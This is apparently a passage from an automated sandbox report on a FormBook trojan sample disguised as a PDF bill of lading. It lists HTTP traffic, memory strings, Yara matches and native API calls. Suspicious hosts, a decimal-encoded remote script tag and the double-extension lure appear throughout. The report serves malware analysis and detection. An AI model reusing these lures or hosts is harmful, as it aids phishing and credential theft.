103, 101, 61, 34,106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 32, 115, 114, 99, 61, 34,104, 116, 116, 112, 115, 58, 47, 47, 115, 111, 46, 55, 56, 57, 121, 121, 100,115, 46, 105, 99, 117, 47, 106, 115, 47, 106, 115, 45, 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-dns-prefetch-control: onset-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:26 GMT; Max-Age=2419200; path=/; secure; SameSite=Strictx-litespeed-tag: b37_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 03:09:26 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 f8 1a 72 3c 1c 45 bb 9a 60 5e 8f 9c 11 19 63 0d ca be b8 d3 fe c1 89 dd c6 5a 4f 13 92 ff b6 fd 6d 5b 80 d4 03 36 d4 6a da 3f 86 0c 87 23 ad f7 af 3b ed 1f 40 44 eb 69 07 8c 60 d7 61 c9 b8 7f 4a a3 18 60 a8 5b 40 30 9e 32 ea 92 61 32 ad fb 24 fe b6 7d 3d 9c ba df b6 5f f5 f3 62 9e 28 46 63 32 06 0c 6f 3d Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-dns-prefetch-control: onset-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:28 GMT; Max-Age=2419200; path=/; secure; SameSite=Strictx-litespeed-tag: b37_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 03:09:29 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 34 35 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 f8 1a 72 3c 1c 45 bb 9a 60 5e 8f 9c 11 19 63 0d ca be b8 d3 fe c1 89 dd c6 5a 4f 13 92 ff b6 fd 6d 5b 80 d4 03 36 d4 6a da 3f 86 0c 87 23 ad f7 af 3b ed 1f 40 44 eb 69 07 8c 60 d7 61 c9 b8 7f 4a a3 18 60 a8 5b 40 30 9e 32 ea 92 61 32 ad fb 24 fe b6 7d 3d 9c ba df b6 5f f5 f3 62 9e 28 46 63 32 06 0c 6f 3d Data Ascii: 4599}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-dns-prefetch-control: onset-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:31 GMT; Max-Age=2419200; path=/; secure; SameSite=Strictx-litespeed-tag: b37_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 03:09:31 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 f8 1a 72 3c 1c 45 bb 9a 60 5e 8f 9c 11 19 63 0d ca be b8 d3 fe c1 89 dd c6 5a 4f 13 92 ff b6 fd 6d 5b 80 d4 03 36 d4 6a da 3f 86 0c 87 23 ad f7 af 3b ed 1f 40 44 eb 69 07 8c 60 d7 61 c9 b8 7f 4a a3 18 60 a8 5b 40 30 9e 32 ea 92 61 32 ad fb 24 fe b6 7d 3d 9c ba df b6 5f f5 f3 62 9e 28 46 63 32 06 0c 6f 3d Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
            Source: gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Open
            Source: write.exe, 00000006.00000002.4199021096.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://justinmezzell.com
            Source: write.exe, 00000006.00000002.4199021096.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000004058000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://myrideguy.net/kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA
            Source: gNKNuXuipEBZec.exe, 00000007.00000002.4200186991.000000000517C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.barbequecritics.com
            Source: gNKNuXuipEBZec.exe, 00000007.00000002.4200186991.000000000517C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.barbequecritics.com/el3s/
            Source: write.exe, 00000006.00000002.4199021096.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.dzyngiri.com
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000006.00000002.4199021096.000000000555C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.00000000036EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://http.gn301.com:12345/?u=
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 00000006.00000002.4197383900.00000000028CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4197383900.00000000028CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 00000006.00000003.2371778257.0000000007621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Bill Of Lading_MEDUVB935991.pdf.exe
            Source: initial sampleStatic PE information: Filename: Bill Of Lading_MEDUVB935991.pdf.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C503 NtClose,1_2_0042C503
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045735C0 NtCreateMutant,LdrInitializeThunk,6_2_045735C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04574650 NtSuspendThread,LdrInitializeThunk,6_2_04574650
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04574340 NtSetContextThread,LdrInitializeThunk,6_2_04574340
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04572C70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572C60 NtCreateKey,LdrInitializeThunk,6_2_04572C60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04572CA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04572D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04572D30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572DD0 NtDelayExecution,LdrInitializeThunk,6_2_04572DD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04572DF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04572EE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04572E80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572F30 NtCreateSection,LdrInitializeThunk,6_2_04572F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572FE0 NtCreateFile,LdrInitializeThunk,6_2_04572FE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572FB0 NtResumeThread,LdrInitializeThunk,6_2_04572FB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045739B0 NtGetContextThread,LdrInitializeThunk,6_2_045739B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572AD0 NtReadFile,LdrInitializeThunk,6_2_04572AD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572AF0 NtWriteFile,LdrInitializeThunk,6_2_04572AF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572B60 NtClose,LdrInitializeThunk,6_2_04572B60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04572BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04572BE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04572BA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04573010 NtOpenDirectoryObject,6_2_04573010
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04573090 NtSetValueKey,6_2_04573090
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572C00 NtQueryInformationProcess,6_2_04572C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572CC0 NtQueryVirtualMemory,6_2_04572CC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572CF0 NtOpenProcess,6_2_04572CF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04573D70 NtOpenThread,6_2_04573D70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04573D10 NtOpenProcessToken,6_2_04573D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572D00 NtSetInformationFile,6_2_04572D00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572DB0 NtEnumerateKey,6_2_04572DB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572E30 NtWriteVirtualMemory,6_2_04572E30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572EA0 NtAdjustPrivilegesToken,6_2_04572EA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572F60 NtCreateProcessEx,6_2_04572F60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572F90 NtProtectVirtualMemory,6_2_04572F90
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572FA0 NtQuerySection,6_2_04572FA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572AB0 NtWaitForSingleObject,6_2_04572AB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04572B80 NtQueryInformationFile,6_2_04572B80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023D9050 NtClose,6_2_023D9050
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023D91B0 NtAllocateVirtualMemory,6_2_023D91B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023D8EC0 NtReadFile,6_2_023D8EC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023D8FB0 NtDeleteFile,6_2_023D8FB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023D8D50 NtCreateFile,6_2_023D8D50
